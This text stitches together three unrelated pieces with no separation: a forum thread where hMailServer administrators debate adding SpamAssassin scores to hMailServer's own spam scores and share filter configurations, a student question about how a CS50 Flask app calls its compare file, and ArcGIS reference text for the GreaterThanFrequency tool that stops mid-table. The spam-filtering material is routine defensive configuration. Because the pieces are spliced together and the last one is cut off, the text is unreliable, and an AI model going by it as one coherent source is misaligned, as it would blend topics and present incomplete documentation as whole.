X-Spam-Status: No, score=-4.4 required=3.0 tests=BAYES_00,DKIM_SIGNED,
DKIM_VALID,DKIM_VALID_AU,FREEMAIL_FROM,HTML_MESSAGE,KHOP_RCVD_TRUST,
RCVD_IN_DNSWL_LOW,RCVD_IN_HOSTKARMA_YE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,
SPF_PASS,T_KAM_HTML_FONT_INVALID autolearn=ham autolearn_force=no
version=3.4.0
X-Spam-Report:
* 0.0 RCVD_IN_HOSTKARMA_YE RBL: HostKarma: relay in yellow list (varies)
* [209.85.212.177 listed in hostkarma.junkemailfilter.com]
* 0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider
* (sandimy[at]gmail.com)
* -0.7 RCVD_IN_DNSWL_LOW RBL: Sender listed at http://www.dnswl.org/, low
* trust
* [209.85.212.177 listed in list.dnswl.org]
* -0.0 RCVD_IN_MSPIKE_H3 RBL: Good reputation (+3)
* [209.85.212.177 listed in wl.mailspike.net]
* -0.0 SPF_PASS SPF: sender matches SPF record
* 0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or Formatted
* Colors in HTML
* -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
* [score: 0.0000]
* 0.0 HTML_MESSAGE BODY: HTML included in message
* -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's
* domain
* -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature
* 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily
* valid
* -0.0 RCVD_IN_MSPIKE_WL Mailspike good senders
* -1.8 KHOP_RCVD_TRUST DNS-Whitelisted sender is verified
*
The result of this one is MINUS 4.4 (-4.4). Now if you were to apply your own HMS rules in DNSBL or SURBL (ones that SA doesn't cover) and even score a match at 5 and 4 (total 9), it would still not hit an HMS threshold of 5 (which you may have set) - despite HMS actually scoring way above this.
This explains why I believe you should only use SA scores when SA has determined it as spam by hitting ITS threshold.
jimimaseye wrote: ... or SURBL (that SA doesnt cover) ...
Mine does... Hint: "URIBL"
Code: Select all
X-Spam-Status: Yes, score=44.5 required=3.0 tests=BAYES_99,BAYES_999,
BODY_URI_ONLY,KAM_RBL,KAM_VERY_BLACK_DBL,MSGID_FROM_MTA_HEADER,
RAZOR2_CF_RANGE_51_100,RAZOR2_CF_RANGE_E8_51_100,RAZOR2_CHECK,
RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_BRBL_LASTEXT,RCVD_IN_MSPIKE_BL,
RCVD_IN_MSPIKE_L5,RCVD_IN_PBL,RCVD_IN_PSBL,RCVD_IN_RP_RNBL,RCVD_IN_SORBS_WEB,
RCVD_IN_XBL,RCVD_NUMERIC_HELO,TVD_RCVD_IP,TVD_RCVD_IP4,T_FSL_HELO_BARE_IP_2,
URIBL_AB_SURBL,URIBL_BLACK,URIBL_DBL_SPAM,URIBL_JP_SURBL,URIBL_SBL,
URIBL_SBL_A,URIBL_SC_SURBL,URIBL_WS_SURBL autolearn=disabled version=3.4.0
X-Spam-Report:
* 0.6 URIBL_SC_SURBL Contains an URL listed in the SC SURBL blocklist
* [URIs: hotdrugsstore.in]
* 1.3 URIBL_JP_SURBL Contains an URL listed in the JP SURBL blocklist
* [URIs: hotdrugsstore.in]
* 4.5 URIBL_AB_SURBL Contains an URL listed in the AB SURBL blocklist
* [URIs: hotdrugsstore.in]
* 1.6 URIBL_WS_SURBL Contains an URL listed in the WS SURBL blocklist
* [URIs: hotdrugsstore.in]
* 3.3 RCVD_IN_PBL RBL: Received via a relay in Spamhaus PBL
* [109.135.11.38 listed in zen.spamhaus.org]
* 0.4 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
* 3.5 BAYES_99 BODY: Bayes spam probability is 99 to 100%
* [score: 1.0000]
* 0.0 TVD_RCVD_IP Message was received from an IP address
* 0.0 TVD_RCVD_IP4 Message was received from an IPv4 address
* 1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
* 0.2 BAYES_999 BODY: Bayes spam probability is 99.9 to 100%
* [score: 1.0000]
* 1.9 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
* above 50%
* [cf: 100]
* 0.9 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
* 0.5 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
* [cf: 100]
* 2.5 URIBL_DBL_SPAM Contains a spam URL listed in the DBL blocklist
* [URIs: hotdrugsstore.in]
* 1.7 URIBL_BLACK Contains an URL listed in the URIBL blacklist
* [URIs: hotdrugsstore.in]
* 3.2 RCVD_IN_MSPIKE_L5 RBL: Very bad reputation (-5)
* [109.135.11.38 listed in bl.mailspike.net]
* 1.4 RCVD_IN_BRBL_LASTEXT RBL: No description available.
* [109.135.11.38 listed in bb.barracudacentral.org]
* 2.7 RCVD_IN_PSBL RBL: Received via a relay in PSBL
* [109.135.11.38 listed in psbl.surriel.com]
* 0.8 RCVD_IN_SORBS_WEB RBL: SORBS: sender is an abusable web server
* [109.135.11.38 listed in dnsbl.sorbs.net]
* 1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,
* https://senderscore.org/blacklistlookup/
* [109.135.11.38 listed in bl.score.senderscore.com]
* 1.3 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
* [Blocked - see <http://www.spamcop.net/bl.shtml?109.135.11.38>]
* 0.1 URIBL_SBL_A Contains URL's A record listed in the SBL blocklist
* [URIs: meekly.hotdrugsstore.in]
* 1.6 URIBL_SBL Contains an URL's NS IP listed in the SBL blocklist
* [URIs: meekly.hotdrugsstore.in]
* 2.0 KAM_RBL Higher scores for hitting multiple trusted RBLs
* 0.0 RCVD_IN_MSPIKE_BL Mailspike blacklisted
* 5.0 KAM_VERY_BLACK_DBL Email that hits both URIBL Black and Spamhaus DBL
* 0.0 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
* 0.0 T_FSL_HELO_BARE_IP_2 No description available.
* 1.0 BODY_URI_ONLY Message body is only a URI in one line of text or for
* an image
SorenR wrote: Mine does... Hint: "URIBL"
I meant you could be adding your OWN lookups into HMS (and setting your own scores against positive matches for them) that Spamassassin has not been coded/rule defined to cover. (I know SA covers most of the main/popular ones such as multi.surbl.org etc., but there might be one the user has found that is not covered by SA rules that he chooses to add).
jimimaseye wrote: I meant you could be adding your OWN lookups into HMS that Spamassassin has not been coded/rule defined to cover [...]
Ah.. My bad
SpamAssassin can be configured to use other URIBL and DNSBL that aren't provide out of the box. I do, in fact, do this. In my configuration, I was assuming that spam scores were all additive and so I disable the DNS and SURBL options in hMailServer so that they would not contribute to double scoring. I have also spent time slowly studying the types of spam we receive and carefully tuning SpamAssassin to my exact needs. I'm somewhat new to hMailServer...coming from using other commercial products (SecurityGateway, SpamTitan, ORF, etc). All of the other commercial products having a continuous running spam score and I have found this to be very logical and effective. I let hMailServer continue to do SPF, HELO command, and sender DNS-MX checks because it is better suited to do so. I feel like those checks combined with the SpamAssassin checks provide very accurate spam checks. In fact, the majority of spams that get through to my system are the ones where SpamAssassin scores below 5 and hMailServer ignores the score (but would have been spam if it didn't because it failed an hMailServer test).
I also feel like hMailServer should change to all floating point scoring like some of the other commercial solutions so that there wouldn't be any integer truncation when adding everything together.
jimimaseye, your example that scored negative is a bit biased. Part of the negative contribution was because the mail is in some trusted whitelist databases. In my experience, you don't find the same IP's and domains both in blacklists AND whitelists....so, while not impossible, it is statistically unlikely the any DNSBL or SURBL hits would have fired for your example.
For me, the functionality seems logical (as I tried to explain above). The SpamAssassin score can be 'used', or simply the spam=yes/no conclusion taken and your own score applied.
I suspect it was intended that you use EITHER SpamAssassin scores ONLY, thereby leaving all decision making up to SA and not adding your own rules on top, OR you use SA's conclusion ("spam=yes"), score it yourself, and run your own HMS testing alongside it (HELO, SPF, DNSBL etc). It seems that using the SA score and then adding the HMS test score to it isn't what it was intended for. After all, why would you ask SA to test for something, then do exactly the same test again in HMS (effectively doubling up the scoring), which is a scenario that is VERY possible (we have already identified that SpamAssassin does the SPF, HELO and mainstream DNSBL and SURBL tests anyway - so why ask HMS to double-check and double the points if you are choosing to accept SA scoring?)
Ideally, you would simply set 'USE SPAMASSASSIN SCORING=YES', set your threshold accordingly (as you do in SA), and leave all HMS scoring and testing turned off (with the exception of a specific SURBL/DNSBL test that you KNOW your SA rules are not covering).
Spam scoring is a regional thing, I don't see the same SPAM as everyone else thus my rules should ideally be different and scored differently.
Unless you are a SpamAssassin expert (or sufficiently nerdy) you can create your own rules to grade scoring to match your environment - most choose not to and rely on pre-built rules that are updated based on a world average of SPAM, simply based on lack of time to maintain those rules. SPAM is evolving all the time and so should the rules to catch it.
Most spammers break rules to deliver SPAM in the most efficient way possible - because someone is paying them - and as we all know; Time is Money.
- GreyListing is a powerful tool - This is where "Time is Money" becomes important.
- SPF WAS a powerful tool; its use is increasing amongst spammers.
- DKIM make everything just a bit more reliable.
- HELO is unfortunately not a reliable way to identify spammers as more home users are "in-sourcing" their mail systems.
- MX... Well, this is where WE can break the rules. It is not a requirement to have MX records according to the RFC's. But, we believe any respectable IT department would have them, if for nothing else than to fight SPAM with a blackhole.MX setup.
- RBL's and SURBL's is a matter of choice. Find one (or more) you trust and "get an opinion from a trusted source".
SpamAssassin will do nearly all of the above, maybe not with the scoring we'd like to use, but then we can add them to hMailServer ourselves. It's like fine-tuning SpamAssassin, outside of SpamAssassin.
Add it all together, and we'll get a pretty good picture of what is SPAM, and what is HAM.
For my part I rate everything as 3, SpamAssassin triggers at 3.0. Anything 3 or above is marked as SPAM, moved into the users SPAM folder, and forwarded to a dedicated SPAM user for further analysis - if needed. Only SPAM scored above 100 is deleted/rejected.
False-positives are added to a hMail rule-based whitelist to prevent them being treated as SPAM - however they will still be marked as SPAM.
Each users SPAM folder and INBOX folder is processed every night to maintain the Bayesian database used by SpamAssassin. The intended rationale is to "localize" SpamAssassin to my neck of the woods. Also the users are able to partly influence classification by moving emails between the two folders for processing the next night (actually, they have a 30 day window).
Despite all efforts I do get SPAM that only SpamAssassin catches... Spammers are getting increasingly clever.
As I posted earlier...
I did a quick search on my server for the highest SPAM score in the last 6 months... 66.2 and it passed ALL of the other SPAM tests in hMailServer (Greylist, SPF, DKIM, HELO, MX, 4 RBL's and SURBL), except SpamAssassin ...
Just for info, my SA has a mark threshold of 3 and that's when mail gets marked as [SPAM].
Anything that reaches HMS over a score of 7 is automatically deleted - remaining unseen and unknown (technically not true - it gets moved to Trash folder straight away by a rule, so viewable IF you want to go there and see it).
I would say that 98% (if not more) of my mail comes in clean and unmarked or deleted as definite spam correctly. The other 2% gets marked as spam (by SA) but remains genuine (usually because the mail comes in sent with full capitals subjects and/or body content - spamassassin dont like that.)
Spam fighting is an art and a never ending battle. I feel like all available spam technologies should be employed. I like the design of being able to deploy anti-spam technologies in a score fashion and add everything together to make the final decision.
Not too many people have chimed in one way or the other. If I am the only one who really feels strongly that all methods should add together to one final score, then I'll just modify the source to behave like I want. After inspecting the source, it seems this change would be rather easy to make. I was really hoping the developer and community would feel as strongly as I do...as I hate maintaining a forked project.
It looks as though I could also write a script to grab the SpamAssassin score and the HMS score and add them together myself in the situations where HMS doesn't add them itself.
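If one did go the scripting route, the SpamAssassin score is recoverable from the X-Spam-Status header shown earlier in the thread. A rough Python sketch of just the parsing step (the header text comes from the examples above; everything else is my own assumption):

import re

# Example header text as shown earlier in the thread.
header = "X-Spam-Status: No, score=0.3 required=3.0 tests=BAYES_00, ..."

match = re.search(r"score=(-?\d+(?:\.\d+)?)", header)
if match:
    sa_score = float(match.group(1))
    print(sa_score)  # 0.3 - could then be added to hMailServer's own score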
mattg wrote: I'd think that NOT doing that is a bug, and that this should be added to the issue tracker at https://github.com/hmailserver/hmailserver/issues
Martin doesn't spend a lot of time any more on the forum
superman20 wrote: Spam fighting is an art and a never ending battle. [...] If I am the only one who really feels strongly that all methods should add together to one final score, then I'll just modify the source to behave like I want.
If you do change the source code, you could try submitting it to Martin for review. You may get lucky and have it included in the release.
Scripting is quite easy. I have my Backup-MX hosted with my ISP and they use a round-robin approach to DNS, so the HELO check fails on 2 of 3 rDNS lookups and the DKIM check fails for obvious reasons; in those cases I rewrite/recalculate the "X-hMailServer-Spam" and "X-hMailServer-Reason-Score" headers.
(Sorry I missed this and didn't answer earlier.)
superman20 wrote: jimimaseye, your example that scored negative is a bit biased. Part of the negative contribution was because the mail is in some trusted whitelist databases. [...]
In my example, I showed a scenario where a message ended up with a MINUS score. Now, let's say that it was sent from China (it wasn't, but it could have been). Still genuine, still allowed, not technically spam (hence its score). BUT... I have a DNSBL rule (zz.countries.nerd.dk) that scores anything coming from China a value of 8, which would be enough to reject this email by hitting my 'delete' threshold of 8 (because I don't want anything from China). And yet, in this example it would clearly have been allowed in, because -4.4 + 8 is only 3.6 = FAILED.
There is nothing unlikely about this scenario for people that are using such geo-blocking (as I am).
jimimaseye, I certainly appreciate the point you're trying to make, but your new example is a bit contradictory. You have negative points because your e-mail hits some whitelists and some positive points because the e-mail hits some blacklists. I don't think any spam configuration would properly deal with that sort of conflicting information. I actually implement your example somewhat but deal with it differently. My settings have e-mail that is geo-located from China to automatically score the reject/delete score...BUT I also make sure that these custom "extreme" rules are run first and when they hit then everything else is short-circuited. This prevents me from allowing a legitimate e-mail from getting any negative points when I want all China e-mail blocked (good or bad).
superman20 wrote: BUT I also make sure that these custom "extreme" rules are run first and when they hit then everything else is short-circuited.
As is my case. And I don't need any special 'coding' or methods to ensure everything else is short-circuited, as this is just how things work currently. As my geoblock DNSBL is in HMS and would hit the threshold, the mail gets rejected immediately and is not passed to SA (delivery refused). However, your earlier suggestion is that everything should be added together, so logically you wouldn't be able to shortcut, because after HMS performs its internal checks it would HAVE to call SA and get its scoring before it could conclude and act on the final score.
You can't have it both ways.
You can somewhat have it both ways if you have spam systems that works together and not independently. Spam checking can definitely stop as soon as the delete threshold is reached. So if the HMS implemented checks hit the delete threshold, then there is no need to call any other checks. However, you must keep going down the chain calling all checks until the delete threshold is reached. Spam testing will never be absolute which is why I strongly feel that it must always be additive. You are adding probabilities and confidence levels that something is spam. If your spam level is 5 and HMS scores 4 and SpamAssassin scores 4 (and assuming a sensible setup where there are no redundant tests), then each one independently says NOT spam, but I'd be willing to bet that it is spam in almost all of those situations.
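A toy sketch of that "run the checks in order, stop as soon as the delete threshold is reached" idea (my own illustration, not any product's actual code):

def total_score(checks, delete_threshold):
    # checks: zero-argument callables, each returning one test's spam score
    score = 0.0
    for check in checks:
        score += check()
        if score >= delete_threshold:
            break  # no need to run the remaining (possibly expensive) checks
    return score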
The problem is that you are suggesting that two totally separate systems, each with its own intensity and complexity (with SA being WAY more advanced than HMS), somehow collate and share their scores, despite one being the little runt of the spam-checking fraternity whilst the other is the guru. Even if HMS scoring allowed negative scores it would only be a LITTLE more advanced and more like SA's capabilities, but it doesn't (SA recognises there are positives, and then has reasons to double-check and apply negatives to counteract them - something HMS spam checking doesn't do).
I maintain the two are TOTALLY separate systems (one written and designed by the HMS author and the other created and written by unrelated entities the HMS author has no control over). It was designed to be that way (use one or the other, but not both, although it won't stop you), and it was designed that way for a reason (recognition that SA will do the job a LOT better than HMS can ever dream of). Using ACTUAL SA scores and adding them to HMS's scoring of its internal checks wouldn't make sense, because SA's idea of what scoring values work and what they should be is coded, tested, retested, fine-tuned, modified and implemented after retesting again. HMS scoring is simply (usually) choose a number, an INTEGER only at that, and apply it. For example, an SA SPF-fail check might score only 0.2 whereas in HMS its default is 2 or 3. Well, how can those work together? Still, it will let you, but only once it has taken the advice from the guru of spam-checking (SpamAssassin) to decide whether there is any REAL threat.
That's my view anyway.
Just using some quiet time to implement SpamAssassin
New Windows 10 Pro machine. Enabled HyperV Server and created a new Ubuntu Server install (running on one core and 512 MB RAM) to run SpamAssassin, ClamAV as per >> viewtopic.php?f=21&t=29053
I've found SA marks far lower than I would like.
Playing with SA rules is deep nerdy stuff. I don't want to go and re-score all tests, and potentially break updates, so I have created a new SA rule that simply adds 2.2 to all SA scores. I have set SA to mark as spam if 3 or higher, without changing the subject.
My existing hMailserver AntiSPAM was working pretty good, with a mark at 5 and delete at 60
I've added ClamAV scores including the Sane-Security databases to SA. Currently Mail gets scanned twice by ClamAV, once to score, and then to categorically detect virus - I am watching to see how that works out.
Also using lots of additional databases and filters that I have found here.
Still looking for a good GeoIP addition for Spamassassin.
Still fine-tuning, but catching more SPAM without catching more HAM
@mattg
A nice source of DNSBL lists ready to use with SpamAssassin is listed here:
http://www.intra2net.com/en/support/antispam/index.php
Could someone post a copy of your spamassassin local.cf with your preferred rules to allow spamassassin do all of the dnsbl and uribl tests . I would like to move all the spam test to spamassassin for better implementation of the scoring and remove it out of hmailserver. It is very confusing when the 2 scoring systems either do not add together or counter each other. I say let one system score for spam and maybe hmailserver do the early spf and dns tests unless spamassassin can do those as well. Not being able to fine tune hmailserver except in whole number integers also skews the scoring. 4.9 is truncated to 4. Thank you
My setup is here: viewtopic.php?f=21&t=28133 (personal settings are in the 2nd post). You will see I simply set a 'tagged by SA' score of 5, in line with the built-in antispam tests. (You don't have to use SA's scoring system.)
You can simply use SA exclusively if you wish by just disabling the built-in antispam tests (DNSBLs etc). I personally (as you will see) use a combination of both. SA does a far better job of antispam testing, so you can be confident that, in the main, if HMS would find it then SA has already found it... and then some.
Thank you for your post. I had seen that setup, but I was hoping there would be a way of just controlling the DNSBL and URIBL tests in local.cf or another file without having to get into all the scripting. Not being a programmer, scripting gets confusing if you do not use it all the time, at least for me. Is there a way to set it in local.cf? Thank you for the help.
In c$\SpamAssassin\share\3.004000\updates_spamassassin_org you will find two files: 20_dnsbl_tests.cf and 25_uribl.cf.
The clever thing with SpamAssassin is that it reads all config files alphabetically ... So if you copy these two files to c$\SpamAssassin\etc\spamassassin and name them my_dnsbl_tests.cf and my_uribl.cf, you can modify them all you want or change the scores, as they are read AFTER the originals.
Anyways, take a look at the files and you'll get the idea how to build your own lists.
***** Example *****
I have a config (KAM.cf) about 288 kb... There is this one rule ...
Code: Select all
#Bad UTF-8 content type and transfer encoding - Thanks to Pedro David Marco for alerting to issue
header __KAM_BAD_UTF8_1 Content-Type =~ /text\/html; charset=\"utf-8\"/i
header __KAM_BAD_UTF8_2 Content-Transfer-Encoding =~ /base64/i
full __RW_BAD_UTF8_3 /^(?:[^\n]|\n(?!\n))*\nContent-Transfer-Encoding:\s+base64(?:[^\n]|\n(?!\n))*\n\n[\s\n]{0,300}[^\s\n].{0,300}[^a-z0-9+\/=\n][^\s\n]/si
meta KAM_BAD_UTF8 (__KAM_BAD_UTF8_1 + __KAM_BAD_UTF8_2 + __RW_BAD_UTF8_3 >= 3)
score KAM_BAD_UTF8 14.0
describe KAM_BAD_UTF8 Bad Content Type and Transfer Encoding that attempts to evade SA scanning
that checks the entire message incl. attachments. If someone sends an email to me with a PDF file in it, it usually takes 300+ seconds and then hMail fails.
I have created an extra config (KAM-fix.cf) containing only this rule
Code: Select all
#Bad UTF-8 content type and transfer encoding - Thanks to Pedro David Marco for alerting to issue
header __KAM_BAD_UTF8_1 Content-Type =~ /text\/html; charset=\"utf-8\"/i
header __KAM_BAD_UTF8_2 Content-Transfer-Encoding =~ /base64/i
body __RW_BAD_UTF8_3 /^(?:[^\n]|\n(?!\n))*\nContent-Transfer-Encoding:\s+base64(?:[^\n]|\n(?!\n))*\n\n[\s\n]{0,300}[^\s\n].{0,300}[^a-z0-9+\/=\n][^\s\n]/si
meta KAM_BAD_UTF8 (__KAM_BAD_UTF8_1 + __KAM_BAD_UTF8_2 + __RW_BAD_UTF8_3 >= 3)
score KAM_BAD_UTF8 14.0
describe KAM_BAD_UTF8 Bad Content Type and Transfer Encoding that attempts to evade SA scanning
where "full" is replaced with "body" in line 4. Since KAM.cf is read first and then KAM-fix.cf, it changes the rule. Now everything passes in less than 10 seconds. - And I don't have to create a script to alter the file every time it is auto-updated.
In your experience with whitelisting and blacklisting is there an easy manageable way to add a whitelist/blacklists in spamassassin instead of hmailserver? I like hmailserver fine but not easy to manage the whitelist and blocking rules when they grow like mine have since trying to get a handle on all the different ways to stop spam but not stop ham. I end up adding the same line or rule again and again. I am sure in your experiences you have said I think there is an easier way to to implement this or manage this. Thanks in advance.
kroberts wrote: In your experience with whitelisting and blacklisting is there an easy manageable way to add whitelists/blacklists in SpamAssassin instead of hMailServer? [...]
My SpamAssassin is reasonably well trained after 3 years, so I have only a few addresses whitelisted in SpamAssassin.
I don't have a blacklist per se... I block emails on multiple levels of identification; body, from, helo and subject, all done in eventhandlers; OnClientConnect(oClient), OnHELO(oClient) and OnAcceptMessage(oClient, oMessage).
80% of what I block is rejected, the rest is marked as SPAM and my daily SpamAssassin training eventually learn the blacklisted emails so I can clean some of the manual blacklist after about 1 month or so.
I check my custom logs every day and adjust filters if needed. Last time was IIRC 2 weeks ago - and I also built a new IDS function to catch brute force IMAPS logon attempts a few days ago.
Here is a snippet of my custom.cf
(I changed the name so that it wasn't overwritten on SpamAssassin upgrade)
Code: Select all
# Some shortcircuiting, if the plugin is enabled
#
ifplugin Mail::SpamAssassin::Plugin::Shortcircuit
#
# default: strongly-whitelisted mails are *really* whitelisted now, if the
# shortcircuiting plugin is active, causing early exit to save CPU load.
# Uncomment to turn this on
#
shortcircuit USER_IN_WHITELIST on
# shortcircuit USER_IN_DEF_WHITELIST on
shortcircuit USER_IN_ALL_SPAM_TO on
shortcircuit SUBJECT_IN_WHITELIST on
# the opposite; blacklisted mails can also save CPU
#
shortcircuit USER_IN_BLACKLIST on
# shortcircuit USER_IN_BLACKLIST_TO on
# shortcircuit SUBJECT_IN_BLACKLIST on
# if you have taken the time to correctly specify your "trusted_networks",
# this is another good way to save CPU
#
endif # Mail::SpamAssassin::Plugin::Shortcircuit
# don't score URIBL
score URIBL_BLACK 0
score URIBL_RED 0
score URIBL_GREY 0
score URIBL_BLOCKED 0
# DNSBL scores
score URIBL_DBL_SPAM 4
score RCVD_IN_SBL 3
# blacklist from
blacklist_from *.top
blacklist_from *.eu
blacklist_from *.download
blacklist_from *.accountant
blacklist_from *.cf
blacklist_from *.party
blacklist_from *.review
blacklist_from *.faith
blacklist_from *.win
blacklist_from *.trade
blacklist_from *.webcam
blacklist_from *.racing
blacklist_from *.date
blacklist_from *.bid
blacklist_from *.cricket
# whitelist from
whitelist_from *@important_domain.com.au
## BELOW is my ClamAV Integration
## NOT needed for what you are doing
loadplugin ClamAV clamav.pm
full CLAMAV eval:check_clamav()
describe CLAMAV Clam AntiVirus detected something...
score CLAMAV 0.001
# Look for specific types of ClamAV detections
header __CLAMAV_PHISH X-Spam-Virus =~ /Yes.{1,30}Phishing/i
header __CLAMAV_PHISH_HEUR X-Spam-Virus =~ /Yes.{1,30}Phishing\.Heuristics\.Email/
header __CLAMAV_SANE X-Spam-Virus =~ /Yes.{1,30}Sanesecurity/i
header __CLAMAV_MBL X-Spam-Virus =~ /Yes.{1,30}MBL/
header __CLAMAV_MSRBL X-Spam-Virus =~ /Yes.{1,30}MSRBL/
header __CLAMAV_VX X-Spam-Virus =~ /Yes.{1,30}VX\./
# Give the above rules a very late priority so that they can see the output
# of previous rules - otherwise they don't work! Not sure what the correct
# priority should be but this seems to work...
priority __CLAMAV_PHISH 9999
priority __CLAMAV_PHISH_HEUR 9999
priority __CLAMAV_SANE 9999
priority __CLAMAV_MBL 9999
priority __CLAMAV_MSRBL 9999
priority __CLAMAV_VX 9999
# Work out what ClamAV detected and score accordingly
# ClamAV general signatures
meta CLAMAV_VIRUS (CLAMAV && !__CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_MBL && !__CLAMAV_MSRBL && !__CLAMAV_VX)
describe CLAMAV_VIRUS Virus found by ClamAV default signatures
score CLAMAV_VIRUS 20.0
# ClamAV phishing signatures
meta CLAMAV_PHISH (CLAMAV && __CLAMAV_PHISH && !__CLAMAV_SANE && !__CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH Phishing email found by ClamAV default signatures
score CLAMAV_PHISH 10.0
# ClamAV phishing with heuristic engine (not signatures based, may lead to false positives)
# Available since ClamAV 0.91
meta CLAMAV_PHISH_HEUR (CLAMAV && __CLAMAV_PHISH_HEUR)
describe CLAMAV_PHISH_HEUR Phishing email found by ClamAV heuristic engine
score CLAMAV_PHISH_HEUR 2.0
# ClamAV SaneSecurity signatures from http://www.sanesecurity.com/clamav/
meta CLAMAV_SANE (CLAMAV && __CLAMAV_SANE)
describe CLAMAV_SANE SPAM found by ClamAV SaneSecurity signatures
score CLAMAV_SANE 15
# ClamAV MBL signatures from http://www.malware.com.br/
meta CLAMAV_MBL (CLAMAV && __CLAMAV_MBL)
describe CLAMAV_MBL Malware found by ClamAV MBL signatures
score CLAMAV_MBL 7.5
# ClamAV MSRBL signatures from http://www.msrbl.com/
meta CLAMAV_MSRBL (CLAMAV && __CLAMAV_MSRBL)
describe CLAMAV_MSRBL SPAM found by ClamAV MSRBL signatures
score CLAMAV_MSRBL 2.0
# ClamAV SecuriteInfo.com VX malware signatures from
# http://www.securiteinfo.com/services/clamav_unofficial_malwares_signatures.shtml
meta CLAMAV_VX (CLAMAV && __CLAMAV_VX)
describe CLAMAV_VX Malware found by SecuriteInfo.com VX signatures
score CLAMAV_VX 5.0
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
mattg wrote: Here is a snippet of my custom.cf
Hi Matt,
I know a few months have already passed. I want to know where to put your custom.cf. Is it under the user directory (~\.spamassassin)?
Is it ok to put the whitelist_from rules in local.cf?
Yep a few months, and I've changed since then
I have a whitelist.cf for just my whitelist entries
I have the KAM rule set in KAM.cf >> https://www.pccc.com/downloads/SpamAssassin/contrib/
I have non-KAM rules from same source
I have a zzLast.cf to negate any rules that are auto-created from the above two lists
I have a blacklist.cf, a matt.cf, a nerds.cf (does the country of origin stuff) and more.
Seems you can have multiple .cf files, and they ALL get read individually
All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
mattg wrote: All of these are in my /etc/spamassassin/ folder on my UBUNTU system. I don't use the Jam Software windows variant of SpamAssassin
It's similar on the windows version. In JAM the local.cf is found (by default) in C:\Program Files\JAM Software\SpamAssassin for Windows\etc\spamassassin. Place other custom .CFs here too.
5.7 on test.
SpamassassinForWindows 3.4.0 spamd service
AV: Clamwin + Clamd service + sanesecurity defs: https://www.hmailserver.com/forum/viewtopic.php?f=21&t=26829
jimimaseye wrote: It's similar on the windows version. In JAM the local.cf is found (by default) in C:\Program Files\JAM Software\SpamAssassin for Windows\etc\spamassassin. Place other custom .CFs here too.
The file path.config in the SpamAssassin directory will specify locations:
Code:
DEF_RULES_DIR=./share/spamassassin
LOCAL_RULES_DIR=./etc/spamassassin
LOCAL_STATE_DIR=./share
SørenR.
Algorithm (noun.)
Word used by programmers when they do not want to explain what they did.
|
(Don't be intimidated by the length of the code chunks; I included all of my guesses as to what's going on, so most of it is just stuff to skim over.)
The folder similarities contains static and template folders (which are probably irrelevant to this question), application.py, helpers.py, compare, and requirements.txt (irrelevant again).
Now I vaguely understand that somehow the command flask run in the terminal runs application.py through $FLASK_APP being set to it in the IDE. I also see that helpers.py is linked to this through
from helpers import lines, sentences, substrings
at the top of application.py. However, how is compare linked to any of this stuff? I can't find it at the top of application.py. See below
import cs50
import re
from flask import Flask, abort, redirect, render_template, request
from html import escape
from werkzeug.exceptions import default_exceptions, HTTPException
from helpers import lines, sentences, substrings
# Web app
app = Flask(__name__)
Here are my guesses as to what is going on:
GUESS 1
flask run doesn't only run application.py but everything in the folder it's being run in, and thus compare is run
I can only assume that somehow the following lines of code at the top and bottom of the compare file play a role
#!/usr/bin/env python3
if __name__ == "__main__":
main()
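For what it's worth, here is a minimal standalone sketch (hypothetical file name, not part of the CS50 distribution) of how that guard behaves: the guarded block runs only when the file is executed directly and is skipped when the file is merely imported.
# guard_demo.py -- hypothetical file name, for illustration only
def main():
    print("running as a script")

if __name__ == "__main__":
    # This branch executes only for `python guard_demo.py`,
    # not for `import guard_demo` (e.g. from application.py or via flask run).
    main()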
GUESS 2
Somehow the code in the 'body' of application.py calls compare in a subtle way I'm not picking up. Here are some lines of code that I believe are the main suspects.
@app.route("/compare", methods=["POST"])
def compare():
"""Handle requests for /compare via POST"""
Otherwise I have no clue
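For completeness, a generic sketch (hypothetical route and names, not the CS50 code) of how a decorated Flask view gets called: the function body runs only when an HTTP request actually hits that path, not at import time.
# Generic sketch, hypothetical names: a decorated view runs only when a request hits its path.
from flask import Flask

app = Flask(__name__)

@app.route("/hello", methods=["GET"])
def hello():
    # Flask calls this function when a client requests /hello;
    # importing the module alone does not execute this body.
    return "hello"

if __name__ == "__main__":
    app.run()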
|
Available with a Spatial Analyst license.
Summary
Evaluates, on a cell-by-cell basis, the number of times a set of rasters is greater than another raster.
Illustration
Usage
An arbitrary number of rasters can be specified in the input raster list.
If a multiband raster is specified for the Input value raster parameter (in_value_raster in Python), only the first band will be used. To process another band, specify that band.
If a multiband raster is specified as one of the inputs for the Input rasters parameter (in_rasters in Python), all bands will be processed.
To process selected bands of a multiband raster, first create a new raster dataset composed of only the required bands with the Composite Bands tool, then use the resulting dataset as the Input rasters (in_rasters in Python).
If the cell value on any of the input rasters is NoData, the cell at that location on the output raster will also be assigned NoData.
The output raster will always be integer.
See Analysis environments and Spatial Analyst for additional details on the geoprocessing environments that apply to this tool.
Syntax
GreaterThanFrequency(in_value_raster, in_rasters)
Parameter Explanation Data Type
in_value_raster
For each cell of the input value raster, the number of times the values in the set of rasters are greater is determined.
Raster Layer
in_rasters
[in_raster,...]
The list of rasters that the input value raster is compared against.
Raster Layer
Return Value
Name Explanation Data Type
out_raster
